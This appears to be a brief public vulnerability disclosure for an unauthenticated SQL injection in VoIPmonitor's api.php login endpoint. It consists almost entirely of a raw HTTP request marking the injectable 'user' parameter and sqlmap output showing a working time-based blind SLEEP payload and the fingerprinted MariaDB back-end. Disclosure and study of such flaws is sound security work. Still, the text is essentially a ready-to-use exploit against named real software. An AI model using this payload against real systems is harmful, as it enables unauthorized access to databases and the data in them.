sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.
GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: closesqlmap result:
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
---
[02:19:33] [INFO] testing MySQL
[02:20:22] [INFO] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'cc: @cnbrkbolat & @R0h1rr1m
website of the product:
https://www.voipmonitor.org/